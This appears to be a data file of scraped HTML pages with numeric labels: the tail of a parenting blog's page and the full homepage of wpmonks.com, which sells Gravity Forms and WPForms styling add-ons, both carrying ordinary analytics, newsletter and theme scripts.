#simple-social-icons-4 ul li a:hover, #simple-social-icons-4 ul li a:focus{background-color:#407fc1 !important;border-color:#ffffff !important;color:#ffffff !important;} #simple-social-icons-4 ul li a:focus{outline:1px dotted #407fc1 !important;} #simple-social-icons-5 ul li a, #simple-social-icons-5 ul li a:hover, #simple-social-icons-5 ul li a:focus{background-color:#a4ce3a !important;border-radius:36px;color:#ffffff !important;border:0px #ffffff solid !important;font-size:14px;padding:7px;} #simple-social-icons-5 ul li a:hover, #simple-social-icons-5 ul li a:focus{background-color:#407fc1 !important;border-color:#ffffff !important;color:#ffffff !important;} #simple-social-icons-5 ul li a:focus{outline:1px dotted #407fc1 !important;}</style> <noscript id="wpfc-google-fonts"><link rel='stylesheet' id='brunch-pro-google-fonts-css' href='//fonts.googleapis.com/css?family=Libre+Baskerville%3Aregular%2Citalic%2C700%7CLato%3Aregular%2Citalic%2C700%2C300%2C300italic%2C700italic%2C900%2C900italic%26subset%3Dlatin%2C&#038;ver=2.1.2' type='text/css' media='all'/> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,600,700|Open+Sans+Condensed:700' rel='stylesheet' type='text/css'> </noscript> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://seemomclick.com/#website","url":"https://seemomclick.com/","name":"See Mom Click\u00ae","potentialAction":{"@type":"SearchAction","target":"https://seemomclick.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Person","url":"https://seemomclick.com/","sameAs":["https://www.facebook.com/seemomclick","https://www.instagram.com/seemomclick/","https://www.linkedin.com/in/lindsayfrank","https://www.youtube.com/user/PandorasDeals","https://www.pinterest.com/seemomclick/","https://twitter.com/SeeMomClick"],"@id":"#person","name":"Lindsay Frank"}</script> <script type='text/javascript' async="async" data-noptimize="1" data-cfasync="false" src='//scripts.mediavine.com/tags/see-mom-click.js?ver=5.1.1'></script> <script src='//seemomclick.com/wp-content/cache/wpfc-minified/frpp19n1/huwtx.js' type="text/javascript"></script> <!--[if lt IE 9]><script type='text/javascript' src='//seemomclick.com/wp-content/cache/wpfc-minified/6jc60ubl/huwti.js'></script><![endif]--> <script src='//seemomclick.com/wp-content/cache/wpfc-minified/l9qkyze1/huwti.js' type="text/javascript"></script> <script>(function(m,a,i,l,e,r){ m['MailerLiteObject']=e;function f(){ var c={ a:arguments,q:[]};var r=this.push(c);return "number"!=typeof r?r:f.bind(c.q);} f.q=f.q||[];m[e]=m[e]||f.bind(f.q);m[e].q=m[e].q||f.q;r=a.createElement(i); var _=a.getElementsByTagName(i)[0];r.async=1;r.src=l+'?v'+(~~(new Date().getTime()/1000000)); _.parentNode.insertBefore(r,_);})(window, document, 'script', 'https://static.mailerlite.com/js/universal.js', 'ml'); var ml_account=ml('accounts', '1021648', 'p0k8z4j4e3', 'load');</script> <script>function ml_webform_success_896524(){ var $=ml_jQuery||jQuery; $('.ml-subscribe-form-896524 .row-success').show(); $('.ml-subscribe-form-896524 .row-form').hide(); }</script> <script defer src="https://static.mailerlite.com/js/w/webforms.min.js?v3772b61f1ec61c541c401d4eadfdd02f" type="text/javascript"></script> <script defer src='//seemomclick.com/wp-content/cache/wpfc-minified/8uuvn3fo/huwtx.js' type="text/javascript"></script> <script>document.addEventListener('DOMContentLoaded',function(){function wpfcgl(){var wgh=document.querySelector('noscript#wpfc-google-fonts').innerText, wgha=wgh.match(/<link[^\>]+>/gi);for(i=0;i<wgha.length;i++){var wrpr=document.createElement('div');wrpr.innerHTML=wgha[i];document.body.appendChild(wrpr.firstChild);}}wpfcgl();});</script> <script>document.addEventListener('DOMContentLoaded',function(){jQuery(document).ready(function($){$(".flexslider").flexslider({controlsContainer: "#genesis-responsive-slider",animation: "slide",directionNav: 0,controlNav: 1,animationDuration: 800,slideshowSpeed: 4000 });});});</script> </body></html>
0
<!DOCTYPE html><html lang="en-US" prefix="og: http://ogp.me/ns#"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://wpmonks.com/xmlrpc.php" /> <script type="text/javascript">document.documentElement.className = 'js';</script> <script>var et_site_url='https://wpmonks.com';var et_post_id='2509';function et_core_page_resource_fallback(a,b){"undefined"===typeof b&&(b=a.sheet.cssRules&&0===a.sheet.cssRules.length);b&&(a.onerror=null,a.onload=null,a.href?a.href=et_site_url+"/?et_core_page_resource="+a.id+et_post_id:a.src&&(a.src=et_site_url+"/?et_core_page_resource="+a.id+et_post_id))}</script><title>Home - WpMonks</title> <!-- This site is optimized with the Yoast SEO Premium plugin v11.0 - https://yoast.com/wordpress/plugins/seo/ --><link rel="canonical" href="https://wpmonks.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Home - WpMonks" /><meta property="og:url" content="https://wpmonks.com/" /><meta property="og:site_name" content="WpMonks" /><meta property="og:image" content="https://wpmonks.com/wp-content/uploads/2017/01/wpmonks-banner.jpg" /><meta property="og:image:secure_url" content="https://wpmonks.com/wp-content/uploads/2017/01/wpmonks-banner.jpg" /><meta property="og:image:width" content="1920" /><meta property="og:image:height" content="1000" /><meta name="twitter:card" content="summary" /><meta name="twitter:title" content="Home - WpMonks" /><meta name="twitter:site" content="@wp_monk" /><meta name="twitter:image" content="https://wpmonks.com/wp-content/uploads/2017/01/wpmonks-banner.jpg" /><meta name="twitter:creator" content="@wp_monk" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://wpmonks.com/#organization","name":"WPMonks","url":"https://wpmonks.com/","sameAs":["https://www.facebook.com/wpmonks.dev.5","https://www.youtube.com/channel/UCVFPUR4yYsMIrayPOqFQspA","https://twitter.com/wp_monk"],"logo":{"@type":"ImageObject","@id":"https://wpmonks.com/#logo","url":"https://wpmonks.com/wp-content/uploads/2019/01/wpmonks-logo-1.jpg","caption":"WPMonks"},"image":{"@id":"https://wpmonks.com/#logo"}},{"@type":"WebSite","@id":"https://wpmonks.com/#website","url":"https://wpmonks.com/","name":"WpMonks","publisher":{"@id":"https://wpmonks.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://wpmonks.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://wpmonks.com/#webpage","url":"https://wpmonks.com/","inLanguage":"en-US","name":"Home - WpMonks","isPartOf":{"@id":"https://wpmonks.com/#website"},"about":{"@id":"https://wpmonks.com/#organization"},"image":{"@type":"ImageObject","@id":"https://wpmonks.com/#primaryimage","url":"https://wpmonks.com/wp-content/uploads/2017/01/wpmonks-banner.jpg","caption":""},"primaryImageOfPage":{"@id":"https://wpmonks.com/#primaryimage"},"datePublished":"2017-01-27T10:31:09+00:00","dateModified":"2019-05-10T05:50:21+00:00"}]}</script> <!-- / Yoast SEO Premium plugin. --><link rel='dns-prefetch' href='//s0.wp.com' /><link rel="alternate" type="application/rss+xml" title="WpMonks &raquo; Feed" href="https://wpmonks.com/feed/" /><link rel="alternate" type="application/rss+xml" title="WpMonks &raquo; Comments Feed" href="https://wpmonks.com/comments/feed/" /><meta content="Divi Child v.3.15.1557288827" name="generator"/><link rel='stylesheet' id='wp-block-library-css' href='https://wpmonks.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='siteground-optimizer-combined-styles-header-css' href='https://wpmonks.com/wp-content/uploads/siteground-optimizer-assets/siteground-optimizer-combined-styles-40ce6eb9d3087e509f7f63b53f55086c.min.css' type='text/css' media='all' /><link rel='stylesheet' id='dashicons-css' href='https://wpmonks.com/wp-includes/css/dashicons.min.css' type='text/css' media='all' /> <script type='text/javascript' src='https://wpmonks.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://wpmonks.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'>/* <![CDATA[ */ var wpmenucart_ajax = {"ajaxurl":"https:\/\/wpmonks.com\/wp-admin\/admin-ajax.php","nonce":"de61ed5fcd","always_display":"1"}; /* ]]> */</script> <script type='text/javascript' src='https://wpmonks.com/wp-content/plugins/wp-menu-cart/javascript/wpmenucart-edd-ajax.js'></script> <script type='text/javascript'>/* <![CDATA[ */ var wpmenucart_ajax_assist = {"shop_plugin":"easy-digital-downloads","always_display":"1"}; /* ]]> */</script> <script type='text/javascript' src='https://wpmonks.com/wp-content/plugins/wp-menu-cart/javascript/wpmenucart-ajax-assist.js'></script> <link rel='https://api.w.org/' href='https://wpmonks.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://wpmonks.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://wpmonks.com/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 5.2" /><link rel='shortlink' href='https://wpmonks.com/' /><link rel="alternate" type="application/json+oembed" href="https://wpmonks.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwpmonks.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://wpmonks.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwpmonks.com%2F&#038;format=xml" /><meta name="generator" content="Easy Digital Downloads v2.9.14" /><link rel='dns-prefetch' href='//v0.wordpress.com'/><style type='text/css'>img#wpstats{display:none}</style><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="shortcut icon" href="https://wpmonks.com/wp-content/uploads/2018/01/17456fb0e26f66534777b30112d83efe.jpeg" /><style type="text/css" id="custom-background-css">body.custom-background { background-color: #f0f0f0; }</style><meta name="google-site-verification" content="o_KpbxU6NGoRoF2Q0b5hyxTLCOoXVYu8QyRhi0hXKeM"><!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-7679493-13"></script> <script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-7679493-13');</script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-MDPNMHT');</script> <!-- End Google Tag Manager --><link rel="stylesheet" id="et-core-unified-cached-inline-styles" href="https://wpmonks.com/wp-content/cache/et/2509/et-core-unified-15579345760283.min.css" onerror="et_core_page_resource_fallback(this, true)" onload="et_core_page_resource_fallback(this)" /></head><body class="home page-template-default page page-id-2509 custom-background et_pb_button_helper_class et_non_fixed_nav et_show_nav et_cover_background et_pb_gutters2 et_primary_nav_dropdown_animation_fade et_secondary_nav_dropdown_animation_fade et_pb_footer_columns3 et_header_style_left et_pb_pagebuilder_layout et_right_sidebar et_divi_theme et-db et_minified_js et_minified_css"><div id="page-container"><header id="main-header" data-height-onload="66"><div class="container clearfix et_menu_container"><div class="logo_container"> <span class="logo_helper"></span> <a href="https://wpmonks.com/"> <img src="https://wpmonks.com/wp-content/uploads/2019/01/wpmonks-logo-1.jpg" alt="WpMonks" id="logo" data-height-percentage="96" /> </a></div><div id="et-top-navigation" data-height="66" data-fixed-height="40"><nav id="top-menu-nav"><ul id="top-menu" class="nav"><li id="menu-item-2733" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-2509 current_page_item menu-item-2733"><a href="https://wpmonks.com/" aria-current="page">Home</a></li><li id="menu-item-80" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-80"><a>Plugins</a><ul class="sub-menu"><li id="menu-item-982" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-982"><a href="https://wpmonks.com/downloads/addon-bundle">GF Addon Bundle</a></li><li id="menu-item-978" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-978"><a href="https://wpmonks.com/downloads/grid-layout/">GF Grid Layout</a></li><li id="menu-item-246" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-246"><a href="https://wpmonks.com/downloads/theme-pack">GF Theme Pack Addon</a></li><li id="menu-item-983" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-983"><a href="https://wpmonks.com/downloads/material-design/">GF Material Design</a></li><li id="menu-item-980" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-980"><a href="https://wpmonks.com/downloads/tooltips">GF Tooltips</a></li><li id="menu-item-979" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-979"><a href="https://wpmonks.com/downloads/custom-themes">GF Custom Themes</a></li><li id="menu-item-981" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-981"><a href="https://wpmonks.com/downloads/field-icons/">GF Field Icons</a></li><li id="menu-item-13557" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-13557"><a href="https://wpmonks.com/downloads/gravity-forms-bootstrap-addon/">GF Bootstrap</a></li></ul></li><li id="menu-item-92" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-92"><a href="https://wpmonks.com/blog/">Blog</a></li><li id="menu-item-95" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-95"><a href="https://wpmonks.com/my-account/">My Account</a></li><li id="menu-item-257" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-257"><a href="https://wpmonks.com/contact-us/">Contact Us</a></li><li class="wpmenucartli wpmenucart-display-standard menu-item" id="wpmenucartli"><a class="wpmenucart-contents empty-wpmenucart-visible" href="https://wpmonks.com" title="Start shopping"><i class="wpmenucart-icon-shopping-cart-0"></i><span class="cartcontents">0 items</span><span class="amount">&#36;0.00</span></a></li></ul></nav><div id="et_mobile_nav_menu"><div class="mobile_nav closed"> <span class="select_page">Select Page</span> <span class="mobile_menu_bar mobile_menu_bar_toggle"></span></div></div></div> <!-- #et-top-navigation --></div> <!-- .container --><div class="et_search_outer"><div class="container et_search_form_container"><form role="search" method="get" class="et-search-form" action="https://wpmonks.com/"> <input type="search" class="et-search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /></form> <span class="et_close_search_field"></span></div></div></header> <!-- #main-header --><div id="et-main-area"><div id="main-content"><article id="post-2509" class="post-2509 page type-page status-publish has-post-thumbnail hentry"><div class="entry-content"><div id="et-boc" class="et-boc"><div class="et_builder_inner_content et_pb_gutters3"><div class="et_pb_section et_pb_section_0 et_pb_with_background et_section_regular"><div class="et_pb_row et_pb_row_0 et_pb_row_fullwidth et_pb_gutters2"><div class="et_pb_column et_pb_column_4_4 et_pb_column_0 et_pb_css_mix_blend_mode_passthrough et-last-child"><div class="et_pb_module et_pb_text et_pb_text_0 et_pb_bg_layout_light et_pb_text_align_left"><div class="et_pb_text_inner"><h1>WordPress Plugins &amp; Theme Development</h1></div></div> <!-- .et_pb_text --><div class="et_pb_module et_pb_text et_pb_text_1 et_pb_bg_layout_light et_pb_text_align_center"><div class="et_pb_text_inner"><p>21000+ Happy Customers</p></div></div> <!-- .et_pb_text --><div class="et_pb_module et_pb_divider_0 et_pb_space et_pb_divider_hidden"><div class="et_pb_divider_internal"></div></div><div class="et_pb_button_module_wrapper et_pb_button_0_wrapper et_pb_button_alignment_center et_pb_module "> <a class="et_pb_button et_pb_button_0 et_pb_bg_layout_light" href="https://wpmonks.com/plugins/">view all plugins</a></div></div> <!-- .et_pb_column --></div> <!-- .et_pb_row --></div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_1 et_pb_with_background et_section_regular"><div class="et_pb_row et_pb_row_1"><div class="et_pb_column et_pb_column_4_4 et_pb_column_1 et_pb_css_mix_blend_mode_passthrough et-last-child"><div class="et_pb_module et_pb_text et_pb_text_2 et_pb_bg_layout_light et_pb_text_align_center"><div class="et_pb_text_inner"><h2>Gravity Forms Add-ons</h2></div></div> <!-- .et_pb_text --></div> <!-- .et_pb_column --></div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_2"><div class="et_pb_column et_pb_column_1_3 et_pb_column_2 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_0 sk-home-blurb et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/material-design/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2018/01/pencil-case1.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/material-design/">Gravity Forms Material Design</a></h1><p><a href="https://wpmonks.com/downloads/material-design/">Gravity Forms material design is a unique plugin that lets you convert your form into material design with&#8230;</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_3 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_1 sk-home-blurb et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/tooltips/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2018/01/light-bulb.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/tooltips/">Tooltips Addon</a></h1><p><a href="https://wpmonks.com/downloads/tooltips/">Tooltips addon for Styles &amp; Layouts for Gravity Forms plugins lets you easily add tooltips to field labels&#8230;</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_4 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_2 sk-home-blurb et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/field-icons/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2018/01/group-of-people-in-a-formation.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/field-icons/">Field Icons</a></h1><p><a href="https://wpmonks.com/downloads/field-icons/">Field Icons addon for Styles &amp; Layouts for Gravity Forms lets you add icons to Gravity Form fields&#8230;.</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --></div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_3"><div class="et_pb_column et_pb_column_1_3 et_pb_column_5 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_3 sk-home-blurb et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/grid-layout/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2018/01/columns.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/grid-layout/">Grid Layout</a></h1><p><a href="https://wpmonks.com/downloads/grid-layout/">Grid Layout for Styles and Layouts for Gravity Forms lets you divide the form into multiple columns. It&#8230;</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_6 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_4 sk-home-blurb et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/custom-themes/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2018/01/paint-brush-and-palette.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/custom-themes/">Custom Themes</a></h1><p><a href="https://wpmonks.com/downloads/custom-themes/">Custom Themes addon for Styles and Layouts for Gravity Forms plugin lets you save your own themes. Once&#8230;</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_7 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_5 sk-home-blurb et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/theme-pack/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2018/01/theme.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/theme-pack/">Theme Pack</a></h1><p><a href="https://wpmonks.com/downloads/theme-pack/">Theme Pack for Styles and Layouts Gravity Forms plugins lets you design your forms within seconds&#8230;</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --></div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_4"><div class="et_pb_column et_pb_column_1_3 et_pb_column_8 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_6 sk-home-blurb et_clickable et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/gravity-forms-bootstrap-addon/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2019/05/bootstrap.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/gravity-forms-bootstrap-addon/">Bootstrap</a></h1><p><a href="https://wpmonks.com/downloads/gravity-forms-bootstrap-addon/">Bootstrap addon lets you add bootstrap styling to your forms in one click.</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_9 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_7 sk-home-blurb et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/addon-bundle/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2018/01/diagram.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/addon-bundle/">Addon Bundle</a></h1><p><a href="https://wpmonks.com/downloads/addon-bundle/">Addon bundle is a collection of all six&nbsp;addons for Styles &amp; Layouts for Gravity Forms plugin. You will&#8230;</a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_10 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"></div> <!-- .et_pb_column --></div> <!-- .et_pb_row --></div> <!-- .et_pb_section --><div class="et_pb_section et_pb_section_2 et_pb_with_background et_section_regular"><div class="et_pb_row et_pb_row_5"><div class="et_pb_column et_pb_column_4_4 et_pb_column_11 et_pb_css_mix_blend_mode_passthrough et-last-child"><div class="et_pb_module et_pb_text et_pb_text_3 et_pb_bg_layout_light et_pb_text_align_center"><div class="et_pb_text_inner"><h2>WpForms Add-ons</h2></div></div> <!-- .et_pb_text --></div> <!-- .et_pb_column --></div> <!-- .et_pb_row --><div class="et_pb_row et_pb_row_6"><div class="et_pb_column et_pb_column_1_3 et_pb_column_12 et_pb_css_mix_blend_mode_passthrough"><div class="et_pb_module et_pb_blurb et_pb_blurb_8 sk-home-blurb et_clickable et_pb_bg_layout_light et_pb_text_align_center et_pb_blurb_position_top"><div class="et_pb_blurb_content"><div class="et_pb_main_blurb_image"><a href="https://wpmonks.com/downloads/bootstrap-for-wpforms/"><span class="et_pb_image_wrap"><img src="https://wpmonks.com/wp-content/uploads/2019/05/bootstrap.png" alt="" class="et-waypoint et_pb_animation_off" /></span></a></div><div class="et_pb_blurb_container"><div class="et_pb_blurb_description"><h1 style="font-size: 21px;"><a style="color: #ff6600;" href="https://wpmonks.com/downloads/bootstrap-for-wpforms/">Bootstrap</a></h1><p><a href="https://wpmonks.com/downloads/bootstrap-for-wpforms/"><span>It lets you add bootstrap to your forms with one click. You will get a live preview&#8230;</span></a></p></div><!-- .et_pb_blurb_description --></div></div> <!-- .et_pb_blurb_content --></div> <!-- .et_pb_blurb --></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_13 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"></div> <!-- .et_pb_column --><div class="et_pb_column et_pb_column_1_3 et_pb_column_14 et_pb_css_mix_blend_mode_passthrough et_pb_column_empty"></div> <!-- .et_pb_column --></div> <!-- .et_pb_row --></div> <!-- .et_pb_section --></div></div></div> <!-- .entry-content --></article> <!-- .et_pb_post --></div> <!-- #main-content --><footer id="main-footer"><div id="footer-bottom"><div class="container clearfix"></div> <!-- .container --></div></footer> <!-- #main-footer --></div> <!-- #et-main-area --></div> <!-- #page-container --> <script type="text/javascript">var et_link_options_data = [{"class":"et_pb_blurb_6","url":"https:\/\/wpmonks.com\/gf-bootstrap\/","target":"_self"},{"class":"et_pb_blurb_8","url":"https:\/\/wpmonks.com\/downloads\/bootstrap-for-wpforms\/","target":"_self"}];</script> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MDPNMHT" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --><link rel='stylesheet' id='jetpack_css-css' href='https://wpmonks.com/wp-content/plugins/jetpack/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript'>/* <![CDATA[ */ var edd_scripts = {"ajaxurl":"https:\/\/wpmonks.com\/wp-admin\/admin-ajax.php","position_in_cart":"","has_purchase_links":"","already_in_cart_message":"You have already added this item to your cart","empty_cart_message":"Your cart is empty","loading":"Loading","select_option":"Please select an option","is_checkout":"0","default_gateway":"paypal","redirect_to_checkout":"1","checkout_page":"https:\/\/wpmonks.com\/checkout\/","permalinks":"1","quantities_enabled":"","taxes_enabled":"0"}; /* ]]> */</script> <script type='text/javascript' src='https://wpmonks.com/wp-content/plugins/easy-digital-downloads/assets/js/edd-ajax.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js'></script> <script type='text/javascript'>/* <![CDATA[ */ var DIVI = {"item_count":"%d Item","items_count":"%d Items"}; var et_shortcodes_strings = {"previous":"Previous","next":"Next"}; var et_pb_custom = {"ajaxurl":"https:\/\/wpmonks.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/wpmonks.com\/wp-content\/themes\/Divi\/images","builder_images_uri":"https:\/\/wpmonks.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"93aafea3e8","subscription_failed":"Please, check the fields below to make sure you entered the correct information.","et_ab_log_nonce":"ed4c22447e","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha.","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"2509","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":"","tinymce_uri":""}; var et_pb_box_shadow_elements = []; /* ]]> */</script> <script type='text/javascript' src='https://wpmonks.com/wp-content/themes/Divi/js/custom.min.js'></script> <script type='text/javascript'>(function($){ $(document).ready( function(){ $('.cart_item.edd_checkout a, input[name="edd_register_submit"], .edd_submit').addClass( 'et_pb_button' ).attr('style', 'padding-right: 1em;'); }); })(jQuery)</script> <script type='text/javascript' src='https://wpmonks.com/wp-content/themes/Divi/core/admin/js/common.js'></script> <script type='text/javascript' src='https://wpmonks.com/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'>_stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3',blog:'108151656',post:'2509',tz:'0',srv:'wpmonks.com'} ]); _stq.push([ 'clickTrackerInit', '108151656', '2509' ]);</script> </body></html>
1
